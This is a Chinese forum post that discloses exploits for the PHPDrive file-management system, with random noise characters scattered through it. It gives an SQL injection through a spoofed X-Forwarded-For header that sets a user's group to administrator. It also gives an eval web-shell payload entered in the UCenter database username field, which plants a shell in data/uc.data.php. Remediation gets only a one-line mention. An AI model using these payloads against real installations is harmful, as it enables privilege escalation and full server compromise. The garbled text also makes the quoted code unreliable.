PHPDrive 是一套运行于 PHP 环境的文件管理系统,可以应用于网盘、企业文件管理、学校、团队管理、软件站、文件CMS等
% h2 Y4 {. p# \) F" k. p$ E9 s- p
: c+ h T& P, L6 E( ]includes/user.lib.php5 |7 P+ B( }" s0 ]+ ~* t0 h1 }
行87
; Q- b$ p, O4 P* N: _ function get_ip() {% Q4 g C" i% C6 d+ w
if(isset($_SERVER["HTTP_X_FORWARDED_FOR"])&&$_SERVER["HTTP_X_FORWARDED_FOR"]) $ip = $_SERVER["HTTP_X_FORWARDED_FOR"];.
# a6 A& m4 M- z7 k9 M! T1 Y在用户注册与登录 处module/disk/account.lead.php- r6 D4 c o5 l; k. L' ^% }
198行 + N- ?% \8 N( [2 W
//更新本次登录IP和时间
0 Y$ Y# u8 T# }% ] $db->Query(‘UPDATE `’.$db->TPre.’user` SET `before_last_date` = ‘.$UserArr['last_date'].’,`last_date` = ‘.$NowUnixTime.’,`before_last_ip` = “‘.$UserArr['last_ip'].’”,`last_ip` = “‘.get_ip().’” WHERE `uid` = ‘.$UserArr['uid'].’;');//get_ip()入库注入产生9 a0 N2 [( D( R: g' w/ S
由于本套程序user与manager是存在于同一个表下的,只是用group字段来区分两者,group=1为管理员,2则为普通用户。所以可以利用以上注入,将普通用户的group值改为1,即可提升权限6 i* o5 [3 Y4 b5 U* s
实现方法:使用firefox的一款插件x-forwarded-for Header 1.0,将你的IP地址改为123″,`group`=”1然后登陆,这时候你就是管理员了.
. O4 j/ j3 c0 n6 U! d( @ d后台getshell:
# y; s6 w) I! K* i在UCenter设置处,将UC数据库登录名填写为2 J- f& l! ]6 ?- X. N4 G5 X: i
3 S7 `9 D% G3 R( Z- x3 yroot’);eval($_POST[DisKill]);?>/*; a2 [! ]; s6 J
可以得到一个shell,位置在 data/uc.data.php2 ^) ~7 j5 J- t b
5 M" X6 G6 E/ m+ D
修复:过滤注入) s6 T. H% o$ ?) i/ w
8 F+ b) v8 X( u3 N# M$ [, R& _
|
发表于 2012-12-31 09:18:34
收藏
支持
反对